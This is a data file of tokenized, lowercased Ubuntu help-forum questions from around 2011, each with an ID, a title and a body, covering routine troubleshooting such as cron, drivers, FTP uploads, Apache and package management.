85558	verify if crontab works	i want to verify if a certain crontab works properly . i have added a job like this : */2 * * * * /path_to_my_php_script/info.php > /dev/null 2 > & 1 i know that i redirect to the null device , but i not sure if the above command is good . *edit 1 : in my /var/log/syslog every two minutes i have the following error : ( cron ) error ( grandchild # 2788 failed with exit status 2 ) *edit 2 : no errors in logs with this new job : */2 * * * * /usr/bin/php /path_to_my_php_script/info.php > /dev/null 2 > & 1
85562	ca n't select lucida sans typewriter as font for konsole	i have lucida sans typewriter font installed in my kde and i can easily use it as text font in my eclipse . however , this font is n't shown in monospaced fonts list when i am selecting a font for konsole or in systemsettings . it is possible , of course , to edit ~/.kde/share/apps/konsole/shell.profile and ~/.kde/share/config/kdeglobals , but is there another way ? by the way , why the system does not recognize lucida sans typewriter as monospaced font ? thanks .
85563	ubuntu v11.10 seems too amatuerish in ui design	a long time windows user , i am totally new to linux/ ubuntu , and have just finished installing version 11.10 on my laptop side-by-side windows7 . although i have read about all the uses of linux and stuff , and i am an experienced web developer , i somehow feel that the ui is a big let down . in version 11.10 - the only linux/ubuntu i have used so far - the 'task bar ' over the left side seems too clunky . and something else that is irritating is the notifications that appear , for example when a new mail arrives , there is a semi transparent message displayed over the top right of the screen , and this thing is displayed for nearly 5 secs with no option to close it manually , as a result it blocks that much of the screen for couple of seconds . i went to see the screenshots of various other distros , and found opensuse to be slick and friendly though i have not used it . could you please let me know - a ) for a newbie , not looking into too advanced features of linux , how opensuse fares with ubuntu - in terms of ui friendliness . b ) should i tryout a previous version of ubuntu , say v10.. does v10 also have such issues ? how does v10 compare with v11 over user friendliness ? as i said , i am new to linux , maybe there are features that let me change all these issues and customise as per my liking , but as of now i have no idea as to how to go about with it . appreciate it if you could guide me to resources on that , if available . thanks !
85567	missing the empathy menu after upgrade to 11.10	since i have upgraded to 11.10 the menu in empathy is gone . after clicking on chat the contact list window opens . but it has no menu . and there is no menu in the top desktop bar where the menu for chat windows appears . is this a bug or a new feature in empathy ? but how to add new buddys then ? update : i have played with compiz config settings and now the menu for empathy works . therefor i think there is a bug somewhere .
85568	`` cpu is not compatible with 64 bit mode '' error trying to install windows 7 ( 64 bit ) on virtualbox	i installed virtualbox from the software center on 64-bit ubuntu 11.10 . when i try to install a 64-bit windows 7 guest i get the following error : attempting to load 64 bit however this cpu is not compatible with 64 bit mode . my host is ubuntu 64-bit , how is it not compatible ?
85577	simple rhythmbox plugins do not work - why ?	simple rhythmbox plugins do not work in 11.10 . does anybody know why ? i heard that ubuntuone plugin for rhythmbox stopped working because some changes to rhythmbox - might this be the same case ? more information : i followed this guide , i.e . i copied the plugin to ~/.gnome2/rhythmbox/plugins , but they do not show up in edit > plugins . i suspect it might be due to the plugins not being ported to gtk3 ?
85580	how do i reinstall graphics drivers after swapping my nvidia for an ati ?	a highly foolish thing to do , i know , but now the poor old pc is stuck bios & grub start ok booting into recovery mode is possible , can get a root shell botting normal mode gets as far as the splash screen ( not the login screen ) but then it hangs , with a black screen , and the monitors switch off saying no signal i 've looked at my xorg.conf and it still refers to nvida being the main device ( that was the old card , now i 've put in an ati radeon ) any tips on how to get everything reconfigured ?
85583	renaming a large tree of `` folder_names '' to `` folder names ''	a friend of mine took the liberty to remove all white-spaces `` `` in the foldernames on our shared drives and substitute them with the underline character `` _ '' . the filenames are unaffected , and the error is systematic propagated in foldernames only any good proposal on which command could resolve this ? thanks.. !
85584	is there any way a can buy on itunes store ?	there 's an album that 's only avaliable on itunes store and i really want it . is there any way i can get it on ubuntu 11.10 ?
85586	other windows of same application get hidden when i close one of them	i have several terminal windows open . they are all on top . underneath them is , say , a browser window . i close one terminal . as a result , all the rest disappear ( ie go out of sight ) underneath the browser , which gains the focus . i am using the latest 11.10 unity with sloppy focus . closing one terminal should not lower all the others . it should leave me with the focus in the next highest terminal , if that previously had the focus before the one i closed . is this a bug ?
85591	how do i change global hotkeys / keyboard shortcuts ?	in 11.04 i change global hotkeys using gconf-editor , in 11.10 there no this software , and i think if developers remove it from base compection , maybe they do this configuration in control panel , but i ca n't find it also i 'd try dconf-editor - and ca n't find hotkeys there .
85592	compiz setting to maximize application window without integrating in global menu	i have mainly problem with applications under wine . global menu integration is problematic most of the time : either there is empty ( transparent ) line block between global menu and application window or if there is not such `` hole '' , application does not respond to mouse pointer coordinates ( like vertical position is shifted some -20-30px ) i do n't know where to search in all compiz settings , but i would like to set some keyboard shortcut which will trigger command to `` maximise '' application windows on desktop space without integrating in global menu . i 'm almost sure there is such setting , but could n't find it i found action `` fill screen '' in edges tab from grid settings , but ca n't find how to associate it to keyboard shortcut ?
85599	how to start eclipse while in gnome shell ?	i upgraded my ubuntu from 10.04 to 11.10 using a usb stick . on 10.04 i had a manual eclipse installation , that got correctly integrated into the unity launch bar ( meaning that i can start and run it ) . but when i log into gnome shell it is like eclipse was never there . i can search for it all i want , its just never found .
85601	python application has no icon in unity launcher	i have written a python application ( with pygtk and pymozembed ) which i use very often . in the unity dash my application has an icon ( as i definded in the .desktop file ) . but when i start it , there is no icon in the launcher . just an empty hole . launcher file : /home/witek/.local/share/applications/kadro-reader.desktop [ desktop entry ] name=google reader comment=open site with kadro : reader - > https : //www.google.com/reader/view/ icon=/home/witek/.kadro/sites/reader/icon.png exec=/home/witek/.kadro/sites/reader/start.sh categories=network ; type=application python code for window initialization : win = gtk.window ( ) win.set_title ( `` google reader '' ) win.set_icon_from_file ( `` /home/witek/.kadro/sites/reader/icon.png '' ) how to add an unity launcher icon to my pyhton application ?
85602	static cd/dvd rom drive location	i have read several questions relating to getting wine to recognise the cd-rom drive with no success . i have installed a windows game and when i go to play it , i get a `` please insert disk into cd-rom drive '' message . i have tried telling wine to designate the cd-rom drive d : , tried editing fstab to mount the drive on startup , and attempted to find the uuid to see if that makes things easier but can not find it . is there a way to assign a static mount point for the cd/dvd-rom drive so wine can address it instead of the random ( /media/ '' disk name '' )
85604	how to make my input only from the external mic instead of both built-in mic and the external	i have a problem with my microphone . i want to record sound with my external microphone , but it picks up sound from built-in laptop microphone too , and it makes noise . my input settings only shows option for analog michrophone ( ext . and built-in mic ) and analog line-in ( from built-in mic ) . what should i do to make the input only from the external mic , instead of two mics ?
85607	import the login theme from 11.10 to 11.04 ?	how do i import the default log in theme from ubuntu 11.10 to ubuntu 11.04 ? i want to do this due to low functionality of 11.10 , but the looks still attract me . if there is anyway to do that , i 'd like to know it . if there is n't any way , how can i customize edit and play with the settings of the log in screen ? ( i mean with to edit the values in it . ) installing lightdm does not help , many problems come from doing that , maybe in a wrong way , i 've tried one guide [ here ] . thanks in advance !
85608	display not showing full desktop	i have a low cost pc that has 800 by 480 resolution physical size . i was using ubuntu hardy , it worked . now i uninstalled ubuntu hardy and installed ubuntu lucid . while installing itself it showed only 80 % of screen and i somehow i installed thinking that it will be okay after installation . ubuntu lucid is installed , still display not showing the full desktop . the task bar is below the actual screen size . if i run any application , it shows only 80 % of application , remaining is buried below the physical size of display . i am not able to adjust the resolution also . the resolution is not changing even after i tried many times with x rander . thanks in advance .
85612	how to call zenity from cron script ?	example script error.sh : # ! /bin/bash zenity -- error -- text='something very bad has happened ! ' my incron-config : ~/documents in_moved_to ~/scripts/error.sh if i run error.sh in terminal gui dialog pops , but not in above incron scenario . how can i make zenity to pop that dialog when i move file in documents folder ?
85615	how can i prevent a ldp printer from printing a blank page at the end of the job ?	i have a new router ( speedport w 921v ) which has usb ports on which i connected my printer ( hp deskjet 950c ) . printing works ( uri : lpd : //192.168.2.1/lpt1 ) , but after each job , the printer sucks out one extra blank page . how can avoid this extra non printed page ? ( i 'm using xubuntu 11.10 and hplip 3.11.7-1ubuntu3 . if the printer is connected to the pc directly or via a windows computer ( samba ) , the problem does n't occur . )
85616	how to get menus in unity-2d and xmonad ?	i am running xmonad with unity-2d on 11.10 on a dual-head configuration , similar to https : //gist.github.com/1300108 and http : //www.haskell.org/haskellwiki/xmonad/using_xmonad_in_unity_2d as a commenter notes in the gist , there are no menus in the panel . if i run an application with ubuntu_menuproxy unset , the app has regular menus . if it is set by default ( as it is by /etc/x11/xsession.d/80appmenu* by the presence of the gtk libappmenu.so libraries , there are no menus displayed in the panel . i see that there is an indicator-appmenu package but i do n't know how to figure out if it is being loaded or how to add it to the panel . there is , on the other hand , no appmenu plugin in /usr/lib/unity-2d/plugins/panel/ . any hints appreciated . thanks !
85621	how do you change the apn for a mobile broadband connection	when i connect the pantech uml290 ( verizon 4g lte ) device to ubuntu 11.10 it recognizes the device but it does n't let me change the apn . the `` new mobile broadband connection '' wizard skips the `` choose your billing plan '' step . so how do i set/change the apn ?
85622	screen turns black when trying to install with a intel hd graphics 3000	i tried to install ubuntu 11.10 64-bit from a pen drive . i have an intel i7 2600k cpu and i use the integrated hd graphics gpu . however , the screen always turns black if i select `` run ubuntu from pendrive '' or `` install ubuntu on hdd '' . i know that there are some issues with that chip but i do n't have any other gpu . so how can i install and run ubuntu on my system ?
85624	can i get an updated iso with all the updates already applied ?	i 'm going to install ubuntu on my other pc , but the thing is that after installing ubuntu it 's going to update more than 208 mb and i do n't want to update 208 mb after installation . is there any way that i can download an already-updated ubuntu 11.10 iso ?
85625	what script should i use to remove apps not related to eclipse development , without disturbing gui functionality ?	i want to reduce the size of plain vanilla ubuntu desktop lts 10.04.3 , as much as possible . purpose : use as eclipse development environment . i do n't want ubuntu server , i still need a gui ( run eclipse etc ) i tried script below , to remove apps not related to development : apt-get update ; apt-get purge -- assume-yes bluez bluez-alsa bluez-cups compiz compiz-core computer-janitor empathy empathy-common espeak espeak-data evolution evolution-common evolution-data-server evolution-webcal f-spot gwibber gwibber-service indicator-me indicator-messages brasero pitivi rhythmbox gnomine quadrapassel gnome-sudoku aisleriot gnome-mahjongg openoffice.org-* mono-2.0-gac python-ubuntuone python-ubuntuone-client python-ubuntuone-storageprotocol brasero-common cdparanoia esound-* ; but when i reboot , i drop into commandline login , not gui login . what script should i use to remove apps not related to eclipse development without disturbing gui functionality ?
85627	how to display a picture in html ?	i am new to ubuntu and i wanted to write a website on it . i am used to windows xp and i am used to writing the display image code as follows : img src= '' c : \users\username\my pictures\test.jpg '' alt= '' picture '' in ubuntu they do not have drive letters , what should i do ? my picture is in a seperate partition named documents and under the file properties it says the directory is : /media/documents/files/micah/homepage website/picture.jpg however when i write it into html it just displays picture in normal text ! ! ! any help ? ( i hope there is cuz thats wut this site is for : p lol )
85628	ubuntu one is there a portable version ?	i would like to be able to use ubuntuone on a usb drive while on the go . there would need to be a way to have a 'portable profile ' that only synced certain things .
85636	ubuntu forgets theme and reverts to default	my documents and folders and all other files have turned into a white paper and the machine and folder menu have the old windows 1990 layout which is very annoying , and i 'd like to change it back to the normal . they work just the same as before but they look very bad . it came after a friend of mine clicked the `` close computer '' button ( the button you also turn the computer on with ) on the keyboard and then he clicked `` turn off/shut down '' in the menu that popped - which should n't do anything , and this was exactly what he did . then when i wanted to turn on the computer again i should choose between some system layouts , which i think it was . i chose the most top and from that time on the appearance of files are awful . i do n't know how to get back to that menu to switch system layout - been browsing the net for ages and tried closing the computer down like my friend did - nothing works . anyone have an idea what to do ?
85637	bulk upload via ftp is interrupted after approx . 50 files	1 . the problem : series upload of 100 or more files via ftp is interrupted . behavior irregular . on a new pc from 2011 , ubuntu just installed . no other problem with ubuntu . fast browser action and website loading . question what could i try , in addition to the steps described here below ? or is there a primitive error or a primitive solution ? original text not modified . updates done by adding : dec.7 , 2011 : information added below in 3.2 ) dec.9,2011 : added : 4.d ) 4.e ) dec.10,2011 : added 4.f ) 2 . more facts : ftp upload of several 1000 files ( several sites ) is here done by own perl programs which send a series of ftp standard commands to the standard ftp of the linux system . effect : similar to mirroring - but enables fine-tuning . the used single commands `` ftp mput '' comprise e.g . 100 files , each file approx . 100 kb . approx . 1000 files per website . uploading to : websites using shared hosting . the servers use linux , e.g . bluehost=hostmonster or lunarpages . 3.1 ) so far i never had such a problem . during years i never had such a problem with fedora . fedora 13 on a pc from 2006 continues to do the job even now properly ( idential dsl connection , identical dsl hardware ) . i intentionally did not upgrade fedora 13 . so linux ftp might have changed a bit in the meantime . but it is not probable that this is the reason . pcs are here only used as os supplier . data and own software are on an external hd , are os-independent and portable ( organized by perl software ) . the new ubuntu pc does not do this job perfectly , while working on the identical external hd and with an identical software environment . ( only the network cable differs , but this should not cause any problem . 1 m length for the old fedora pc , 5 m for the new ubuntu pc . ) 3.2 ) ubuntu specifics cause probably the problem ( added dec.7,2011 ) in the meantime / now i have : ubuntu 64b from late 2011 on the new pc / 2011 , sata hard disks . ubuntu 32b from late 2011 on the old pc / 2006 , pata ( /ide ) hard disks . these are just suppliers of the operating system . all data , software and execution is done on an external hd which is identical for both cases . in both cases , the described problem occurs . it does not occur for the old pc when run with fedora 13 ( from 2009 or so ) . the problem is hence very probably somehow correlated to specific features of ubuntu . there is a very low probability that since fedora 13 the general linux system has changed , resulting in this problem . with a rapid google search , so far i did not find any information about similar problems . everything else of ubuntu is working fine on the new pc with a wide screen . so it is from now for a while here the choice . i am getting these weeks a 10 times faster dsl internet connection . perhaps the problem will then disappear . ( i suppose it will not disappear . ) 4.a ) priority setting does not help . with the command nice i have tested a priority of -18 ( verified in gnome-system-monotor - yes , -18 ) . this did not help . 4.b ) sudo use did not help i also tried to call the perl program which does the job , with sudo . this did not influence the result . 4.c ) behaviour irregular there is no rule at what point of time ( which file ) the upload is stopped . normally after some minutes - only once it did the whole job of 2 hours . there is perhaps a minor correlation to the rush hours of internet use . but this is not sure . 4.d ) no help from : source code , -i flag , -v flag ( added 9 dec.2011 ) the involved complete long perl programs would not be helpful here . ( various features , sites , specifics , ... ) . here the own command ( perl subroutine ) with the upload problem ( example ) : & ftp_c_mput ( `` www/ppp-de/*.htm '' ) this simply does the ftp command : mput www/ppp-de/*.htm for ~200 files , but ( the problem : ) halts at file 30 or so -i all is automatic - hence already with -i flag , hence nothing interactive . so a timeout error should normally never occur . -v -- - always in verbose mode ( therefore the results in nr.5.2 . and 5.3 . ) i still have to implement within the software the debug function -d ( like recommended ) . it is doubful that it will help - because ... : 4.e ) most probable problem reason - i suppose ( added dec 9,2011 ) most probable is that some process , specific to ubuntu , creates a delay - so that the ftp program does not supply fast enough the next file to the remote pc ( internet server ) . but i did not state delays of several seconds for any other function . everything works perfect and fast . and i could not find any correlation of some software action or so before the problem occurrence . i state per , anently a short hard disk access every 3 seconds ( if the control led is acting properly ) . every 3 seconds - or faster . not regular . this may have simple explanations . this even continues when there is no application running - a totally blank monitor . but i do not believe that the reason is related to this . 4.f ) debug feature ? ftp -d ( added dec.10,2011 ) the -d flag for ftp : not tried ( while recommended by a comment ) . the -d flag as such is not sufficient . to get ftp logged , various steps are required ( rsyslog.conf ... ) . the probability that this time investment would lead to success , is for this problem type close to zero . so i will instead continue the work-around : doing bulk uploading on fedora ( = pc 1 ) , all the rest on ubuntu ( = pc2 ) , and try other steps to find in some future the solution . 5.1 . example : this is a control display during uploads this display is done by my own perl programs , hence not by ftp . shortened . may include 100 ... 300 files . www/xmed-ppp-de/index.htm www/xmed-ppp-de/wweb-pare-med-de.htm www/xmed-ppp-de/wwee-fina-med-de.htm www/xmed-ppp-de/wwfu-cont-med-de.htm www/xmed-ppp-de/wwfu-sepa-med-de.htm 5.2 . example : the standard display of the ftp program is like : 150 connecting to port 63555 # ... 226-file successfully transferred 226 7.126 seconds ( measured here ) , 10.14 kbytes per second 73985 bytes sent in 0.81 secs ( 89.7 kb/s ) local : www/xmed-ppp-de/wyck-tob-bo-med-de.htm remote : www/xmed-ppp-de/wyck-tob-bo-med-de.htm 200 port command successful 5.3 . example : the display when interrupted : with new installed ubuntu on a new pc , the series is ending mostly after approx . 30 files , varying in random manner between 20 und 50 , with the following error message : - hence : a timeout error for my typing - but it was the ftp bulk command mput , - so there can not really be a typing speed problem on my pc ... 150 connecting to port 63562 # ... 226-file successfully transferred 226 10.317 seconds ( measured here ) , 14.02 kbytes per second 148068 bytes sent in 6.65 secs ( 21.8 kb/s ) local : www/xmed-ppp-de/wyck-tob-ris-med-de.htm remote : www/xmed-ppp-de/wyck-tob-ris-med-de.htm 200 port command successful 421 timeout - try typing a little faster next time local : www/xmed-ppp-de/wyck-tob-sto-med-de.htm remote : www/xmed-ppp-de/wyck-tob-sto-med-de.htm no control connection for command : success local : www/xmed-ppp-de/wycu-nut-med-de.htm remote : www/xmed-ppp-de/wycu-nut-med-de.htm ... ... ... ... ... etc . etc . for all following files ... ... ... ...
85640	unable to boot into ubuntu after fresh installation	in my laptop ( lenovo ideapad v570 ) , which came with 750gb hdd with 4 ntfs primary partitions i installed ubuntu by following these steps the 4 partions were , 1 . ( 650gb ) windows7 2 . ( 30gb ) lenovo/drivers 3.system 210 mb 4 . ( 16gb ) recovery i shrunk the windows drive to 245gb , by using disk management in windows 7 and created unallocated free space of ~450gb using ubuntu live cd , i installed ubuntu 11.10 by selecting the option ănstall along side windows ubuntu 11.10 was installed without any error . but on reboot , the boot menu does not appear and system boots into windows 7 . i checked again using ubuntu live cd , and ubuntu is actually installed on the harddrive . ( i could browse the files ) the ubuntu disk utility output is as shown below . as can be seen in the screenshot , there is a warning that says , `` partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested '' . does this warning has anything to do with the problem ?
85641	how do i deal with `` unauthenticated sources '' errors in the software center ?	any install that i 'm trying through the software center is telling me : requires installation of untrusted packages : the action would require the installation of packages from not authenticated sources . i did an apt-get update from the command line , then removed the software sources that the keys were bad from ( ppas i added myself ) , and unchecked them in the software sources for software center , but to no avail . i ca n't install anything from software center anymore - only > from the command line with apt-get . is uninstalling/installing the only option ? i do n't want to break other ppas that i have . additional information : here 's a paste from apt-get update : reading package lists ... done w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey b725097b3acc3965 w : gpg error : http : //us.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > i 've tried apt-key update , and there was no effect ( two keys unchanged ) . the output of apt-get update and apt-get upgrade , and the contents of /etc/apt/sources.list , can be found in this pastebin post .
85642	wget to download ubuntu repo	i 'm setting up an offline ubuntu repo and i need to download the ubuntu repo using a windows machine . i have access to wget.exe . what is the command to do this ? thanks in advance .
85644	how can i remove ubuntu from my pc ?	i 'm someone who installed ubuntu 11.10 on his computer and erased w7 . now i want to erase it and i do n't know how ... someone who could explain me in simple terms , step by step ! ! ! thanks . i also searched elsewhere but explanations are not good , they skip steps or are too risky soy un boludo que instalo el ubuntu 11.10 en su computadora y borre el w7 . ahora , lo que quiero es borrarlo y no se como ... alguien que sepa explicarme en terminos sinples , pasooo pooor pasooo ! ! ! gracias . busque en otros lados pero no te lo explican bien , se comen pasos o son muy riesgosos
85645	parental control of log in ?	i gave my daughter 's user account on ubuntu 11.10 a password that only i know so that i could control her use of the computer if needed . she just logs in to the `` other '' account on the log in page , defeating all my use of a password that only i know . can anyone help with this problem ? is there any way to delete the `` other '' account ? thanks in advance for any help .
85650	ssh connecting with one command line	i 'm trying to connect to the ssh with the following command : ssh user : pass @ host bit still it 's asking the password , how can i login without asking the password again ?
85652	speakers do n't work unless i plug the headphones in	i have this odd issue with my audio output . speakers do n't seem to work , however if i plug the headphones they work perfectly . then , if i unplug the headphones , the speakers start to work again . this all begun after i connected my laptop to a roland cube 60 amplifier through jack/mini jack adapter , but i have no idea how this can be related . i tried to play a bit with audio options but nothing worked out . this works in windows so i know it 's not a hardware problem .
85659	is there a way to make the panel calendar `` functional '' in ubuntu 11.10 ?	i 'm using 11.10 and have n't ditched unity , but i believe the calendar in the panel ( the upper right of the screen ) is part of gnome . anyway , i can view the calendar and highlight a specific day but that 's it . it 's not a shortcut to any calendar that you could do scheduling or anything . am i missing some functions or is the extent of this calendars interactivity ? if the calendar is really just for display , how do i change that to make it actually function with say , google calendar ?
85663	samsung rv420 is compatible with ubuntu ?	i would like to know if the notebook samsung rv420 is compatible with ubuntu 11.10 . the processor is a core i3 2310m with 4gb of ram . the hardware works properly with ubuntu ? anyone has this model ? or at least one similar ? thanks .
85666	apache fails to stay up more than a minute	this is like my other question , yes , but ! i have more detail . first off , i start apache , and it stays for a minute , and turns off . i found this in the error log : [ notice ] caught sigterm , shutting down [ notice ] apache/2.2.20 ( ubuntu ) php/5.3.6-13ubuntu3.2 with suhosin-patch configured -- resuming normal operations after that , it just does n't work no more , i have to restart apache but it just shuts down after a minute when i restart it .
85672	how can i speed up boot it is unresponsive for a long time after the desktop is presented ?	my lenovo s12 ( intel atom ) laptop was taking a very long time to boot , and i found the solution here . after that fix , it would boot quickly , but for a long time after the desktop was presented , the mousepad and key board would not respond . so long at first i thought the system was broken . what could cause this ?
85675	suddenly studio 1558 switchoff because of overheating	my fan works fine and is not broken . fan works but the system overheats . the same system when i use for windows7 works perfectly fine . please help to solve this problem . i ca n't work like this because i loose my work most of the times because of this sudden system off . and i fear that it might cause me hardware failuer .
85676	can i make the top panel blend with the launcher ?	when you open the dash , the top bar becomes transparent and the top panel , launcher and dash all seem to blend together , is it possible to make it look that way all the time , even when the dash is closed ?
85680	pygtk application example	i 'm planing to write my first ubuntu app . i 'm new in python and looking for good example , an open source app , just to pick the patterns and architecture . is there any good example ? it would be nice if app is available in ubuntu software center as well . also , i see that pygtk is being phased out and replaced with pygobject ( is pygtk still relevant ? ) . i wanted to use quickly , is that the way to go ?
85684	ubuntu crashes , where do i look to fix it ?	my ubuntu laptop crashes with a bunch of code on the screen . where can i look to see what is causing the crash ?
85688	how do i get the wicd manager to appear in the system tray ?	i have a lenovo s12 ( intel atom ) on which network manager does not work . i have replaced it with wicd , and accepted work路around . with the traditioanl gnome , the wicd connection would appear in the system tray on the panel . it is not showing on unity ( 11.10 ) . how do i get this to appear ?
85696	macbook pro 8.1 running osx lion , windows7 and ubuntu 11.10 problem	i have successfully installed the above 3 operating systems . windows 7 fails to boot . in refit , i select it , its sends me to ubuntu 's bootloader ( grub ) . there too i select windows 7 from the list , after it comes up with a blank black screen with only a cursor blinking forever - macosx lion boots fine , as do ubuntu 11.10 ... again refit and grub do see windows 7 perfectly , only it fails to load . i am using a macbook pro 8.1 .
85699	jackd mutes pulseaudio	i use rakarrack for guitar effects and i want to listen mp3 playback ( banshee etc . ) and midi ( tuxguitar etc. ) . but when i start rakarack it starts jack and jack mutes all other sound sources except for rakarrack . i ca n't start jack while banshee or other playback program is running . jack and pulseaudio do n't seem to be working at the same time how can i fix this ?
85703	how to break or delete the symbolic link ?	sudo ln -fs /usr/share/icons/cyclone/cursor.theme etc/alternatives/x-cursor-theme i want to delete this link , as it seems to make some problems . is this done by deleting cursor.theme file or what are the steps to archive a complete deletion ?
85705	stop laptop from suspending when closing lid in lightdm	how do i stop my laptop from suspending when closing the lid under lightdm - the power management settings in xfce or gnome 3 does not seem to apply when the window manager is not running .
85709	what do these symbols in some linux terminal commands mean ?	on askubuntu , i 've seen a few commands around that look quite complicated , with lots of symbols in them . to get a better understanding of how these commands are built up , i 'd like to know what the symbols stand for . for example : find ~/ -name \*.c -exec sed -i `` s/cybernetnews/cybernet/g '' { } \ ; or even more complicated : echo -e `` \e [ $ { i # *= } m $ ( x= $ { i % =* } ; [ `` $ { ! x } '' ] & & echo `` $ { ! x } '' || echo `` $ x '' ) \e [ m '' i understand very well that adding parameters as -c , -- debug , have certain effects on the main commmand . the meanings of these are in almost all cases to be found in the man pages , so that 's not really what i 'm looking for . please , try in your answer to define what the symbols specifically do , instead of explaining the examples i gave . that could look like this : '' means 'argument ' : the main command uses anything within these symbols as its source ^ is used for ... # is used for ... thanks in advance
85710	how do i make a subdomain of a subdomain ?	i have a server that hosts mydomain.com . then i have a server that hosts subdomain1.mydomain.com . on the subdomain1.mydomain.com server , how do i make subdomains ? for instance i want to create subdomain2.subdomain1.mydomain.com i have my subdomain1.mydomain.com site in /home/user/public_html and it is working just fine . but when i try to create subdomain2.subdomain1.mydomain.com , it says server not found in the browser . i have tried so many configurations in my /etc/hosts and /etc/apache2/sites-available/subdomain2.subdomain1.mydomain.com , without any luck can i get some detailed instructions maybe ? i have looked everywhere and every place tells you different , with no luck . ubuntu server 11.10 w/ the lamp stack option
85718	how i can turn off computer on lan ?	how i can turn off computer on lan ? i shutdown a computer that is on lan via wi-fi . i have his ip and mac address that i do now ?
85721	create my own unity lens	is there any easy way of creating a unity lens without any big programming knowledge ? i can code in php , mysql , html and all those web stuff . i wan na create a lens that connects to my website mysql database and searches for users on my site anyone that can tell me how or show me a tutorial or tell me which stuff i need to learn before creating a lens ?
85725	is there an alternative to installing ruby version manager ( rvm ) from repository in ubuntu software center ?	i generally avoid the hosted ruby repos and install rvm manually but i notice there 's an rvm repo in ubuntu software center now . has anyone used it ? would i be better off continuing to install rvm manually ? i expect that , like rvm , it installs into the home directory as opposed to one that requires sudo access .
85726	can not reactivate laptop after screen blanks on screen lock	i have experienced the following issue . this occurred after upgrading from 11.04 to 11.10 . i have an intel graphics card , as confirmed by the command : ari @ ari-laptop : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) there are no proprietary drivers on my laptop . when i leave my laptop inactive for more than a short period of time , so that the screen lock activates itself , it is frequently impossible to reactivate the screen . it `` comes alive '' with a faint grey hue that fades to black within a few seconds and nothing shows up no matter what action i take . the only solution is to turn off the laptop by pressing power on/off for a few seconds and then restart . interestingly , when i have an external monitor attached the issue persists on the laptop screen , but the external monitor remains active and functioning . the consequence is that i have to reboot my laptop several times a day . any ideas ?
85731	what happens on a first login ?	just asking . i have n't freshly installed ubuntu for a while now , and i am just curious . if one were to install , say 11.10 on a computer , would any program open up on the first login ? like a welcome to ubuntu banner or a guide to ubuntu from the help section ?
85733	μπορώ να περάσω στο asus εee pad transformer prime linux ?	θέλω να προβώ στην αγορά του παραπάνω tablet το οποίο θα βγει τα χριστούγεννα στην αγορά . ειναι το πρώτο 4πύρηνο νομίζω . οποτε μου δημιουργήθηκε η απορία αν θα μπορώ να περάσω linux se aυτό κυρίως λόγω εφαρμογών που προσφέρει το λinux έναντι του αndroid . εχει επεξεργαστη nvidia tegra 3 ( τετραπύρρηνος ) 1 giga ram και 32 ή 64 χωριτικότητα . θα μπορώ να τα περάσω και να τα αξιοποιήσω πλήρως ? αν ναι τι επιπτώσεις θα έχει αυτο ? ευχαριστώ εκ των προτέρων .
85735	guake terminal transparency sometimes acts weird	i am using guake since 11.04 , and i like it very much , it 's my default terminal . obviously i am using it 's transparency option . because i have n't paying too much attention to it , i am not sure if the default transparency should be . should it make all the background window transparent and show me the desktop behind ? or should it be transparent only to the first application it has open in the background . i ask this question because i have noticed in the past week both situation happen on my ubuntu 11.10 install . so right now i am puzzled about how it should be . and because it should n't behave different from day to day , i am suspecting guake not be fully compatible with unity . any ideas ? i attach a picture of how i have it now , transparent to the desktop through chrome and nautilus edit : i have just looked at guake homepage on this screenshot . i can clearly see that the transparency should not go until the desktop , but it should show the first application it has in the background . edit2 : killed guake and restarted it . the transparency works ok now :
85737	how do i restore admin access ?	i 'm thinking that i 've lost su/root access to my system but wanted to throw this question out to see if there was any hope left . my own personal account was the first to be created upon installing ubuntu and this the only administrator . a few other accounts were created but as standard users . the system was to be given to one user and all other users removed including my own account . i thus removed everyone from the system except the user that was going to own the system nor my own ( because i was logged on ) . so under the other account , i was going to attempt removing my own `` administrator '' account and make the remaining user the admin . i did something horribly wrong which was demote myself to standard user , and then now obviously , can not not not only remove my own account , but make the remaining user the admin . i tried a few things like going to recovery mode , looking for info on how to reset root password ... but nothing . any ideas ?
85739	the mouse pointer moves by itself	on my laptop , when i use the trackpad , the mouse pointer continues to move in the direction of my last move , as long as i keep my finger in contact with the trackpad ( although my finger is still ) . i 'm not sure , but i think it appends after i upgrade the nvidia driver to 290.10 any ideas ? my configuration is : ubuntu 11.10 , unity 3d , nvidia geforce go 7400 ( drivers 290.10 )
85741	how do i mount , edit and repack an .img file ?	i have downloaded a .img file to use on my android device . i have to edit a file in the image in order to use it . how can i mount the file so i can edit the text file and then re-pack the .img ?
85744	preseed file being ignored during installation	i 've followed this document pretty well ( http : //askubuntu.com/questions/29121/guide-to-particulars-in-customizing-ubuntu-installer / specifically : http : //askubuntu.com/a/29632/36927 ) , however it seems to ignore the preseed.cfg file i created . i 've included this in initrd when it is rebuilt ( following the directions ) and i also tried appending it as a boot option ( /cdrom/preseed.cfg ) , either way the options in the preseed.cfg file are n't being used . i 've tested by by having a late_command wget a file from my server , and also by throwing a text file on the target / filesystem . i 'm really hoping that i 'm missing something simple ... but so far i ca n't seem to figure out what it would be . thanks
85748	how can i remove the record of an installed package without deleting any files ?	i made the mistake of installing jenkins from the ubuntu package , which causes endless stress around here in update management . i have no quarrel with how ubuntu arranged the files on disk . for the curious , jenkins has an internal package manager that downloads plugin updates , and careful coordination of main jenkins installs and plugin upgrades is required to avoid chaotic conditions . so we haver to carefully block jenkins upgrades via , oh , apt-get upgrade when we do n't know exactly what 's going on with the plugins . so , what i 'd like to do is persuade dpkg / apt-get to forget that there is a jenkins package , without letting it delete any existing files . by the way , the 'install ' consists of one '.war ' file plus the /etc/init.d links . obviously , i can backup up what i care about , remove the package , and restore , but i was hoping to learn that there was an obscure dpkg option that forgot to delete files . is there a way ?
85749	lcd brightness step on t520 with ubuntu 11.10	on lenovo t520 combination fn + home/end for increasing/decreasing screen brightness works perfectly out-of-box but with the step = 3 . it 's too coarse ( hw values are 0..15 ) . how to change the step to 1 ?
85750	playing video on www.foxsoccer.tv does not work	how can i play video through www.foxsoccer.tv ? i do n't have problems with playing video , i.e . watching live events on espn , but on the foxsoccer website it just shows the loading video icon and never plays . are there any options i can choose in mozilla or in my operating system : 11.10 ?
85752	how to install a thesaurus in libreoffice ?	how can i enable the thesaurus in libreoffice ?
